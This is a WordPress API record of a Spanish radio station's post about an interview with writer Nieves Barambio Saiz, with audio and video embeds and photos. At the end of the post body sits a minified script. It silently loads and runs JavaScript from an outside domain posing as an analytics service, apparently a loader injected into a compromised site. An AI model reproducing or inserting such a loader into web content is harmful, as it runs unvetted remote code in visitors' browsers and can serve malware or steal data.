{"id":7752,"date":"2026-01-22T14:11:48","date_gmt":"2026-01-22T14:11:48","guid":{"rendered":"https:\/\/radiojabato.es\/?p=7752"},"modified":"2026-04-20T14:54:32","modified_gmt":"2026-04-20T14:54:32","slug":"coslada-accesible-nieves-barambio-saiz-escritora-afiliada-a-la-once","status":"publish","type":"post","link":"https:\/\/radiojabato.es\/?p=7752","title":{"rendered":"COSLADA ACCESIBLE: \u00abNieves Barambio Saiz escritora afiliada a la ONCE\u00bb."},"content":{"rendered":"\n<iframe src=\"https:\/\/www.ivoox.com\/player_ej_167179908_6_1.html?c1=f9ea0c\" width=\"100%\" height=\"200\" frameborder=\"0\" allowfullscreen=\"\" scrolling=\"no\" loading=\"lazy\"><\/iframe>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"COSLADA ACCESIBLE: &quot;Nieves Barambio Saiz escritora afiliada a la ONCE&quot;.\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/zocz0nVROYc?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Tras actualizar informaci\u00f3n de la asociaci\u00f3n con el proyecto en marcha en colaboraci\u00f3n con el centro de educaci\u00f3n especial Rosa Parks, del que iremos hablando m\u00e1s adelante cuando ya se pongan en marcha en los comercios de ciudad 70, entrevistamos a Nieves Barambio Saiz escritora afiliada a la ONCE que nos cuenta curiosidades de sus siete libros que tiene publicados hasta el momento, hablamos de su vida profesional como profesora y nos da pinceladas de las obras que tiene en proyecto ya comenzadas.<\/p>\n\n\n\n<p>En su recorrido, presentando los guardianes de la memoria t\u00edtulo de su \u00faltima obra pasar\u00e1 por Coslada el pr\u00f3ximo 27 de febrero.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"7753\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_2_2026-01-21_14-53-24-1024x768.jpg\" alt=\"\" class=\"wp-image-7753\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_2_2026-01-21_14-53-24-1024x768.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_2_2026-01-21_14-53-24-300x225.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_2_2026-01-21_14-53-24-768x576.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_2_2026-01-21_14-53-24.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"7754\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_3_2026-01-21_14-53-24-768x1024.jpg\" alt=\"\" class=\"wp-image-7754\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_3_2026-01-21_14-53-24-768x1024.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_3_2026-01-21_14-53-24-225x300.jpg 225w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_3_2026-01-21_14-53-24.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"7755\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_4_2026-01-21_14-53-24-768x1024.jpg\" alt=\"\" class=\"wp-image-7755\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_4_2026-01-21_14-53-24-768x1024.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_4_2026-01-21_14-53-24-225x300.jpg 225w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_4_2026-01-21_14-53-24.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n<\/figure>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>Tras actualizar informaci\u00f3n de la asociaci\u00f3n con el proyecto en marcha en colaboraci\u00f3n con el centro de educaci\u00f3n especial Rosa Parks, del que iremos hablando m\u00e1s adelante cuando ya se [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[337],"tags":[],"class_list":["post-7752","post","type-post","status-publish","format-standard","hentry","category-coslada-accesible"],"_links":{"self":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/7752","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7752"}],"version-history":[{"count":2,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/7752\/revisions"}],"predecessor-version":[{"id":14273,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/7752\/revisions\/14273"}],"wp:attachment":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7752"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7752"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7752"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}